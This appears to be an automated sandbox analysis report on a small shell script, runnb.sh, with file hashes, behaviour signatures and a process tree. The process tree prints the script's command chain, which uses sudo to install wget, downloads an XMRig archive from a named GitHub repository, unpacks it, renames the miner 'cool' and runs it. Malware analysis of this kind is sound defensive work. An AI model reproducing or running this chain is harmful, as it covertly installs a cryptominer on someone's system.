Analysis
-
max time kernel
57s -
max time network
1679s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-10-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral7
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral8
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 762 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Processes:
dpkgtarmvsudoaptdpkgdescription ioc process File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems sudo File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
aptdescription ioc process File opened for modification /tmp/fileutl.message.Pvz8pq apt File opened for modification /tmp/fileutl.message.mXRjMW apt File opened for modification /tmp/fileutl.message.Pq8IyG apt File opened for modification /tmp/fileutl.message.0U0kud apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:714
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:718 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:731 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:738 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:760
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:761 -
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:762 -
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:763 -
/tmp/cool./cool2⤵PID:764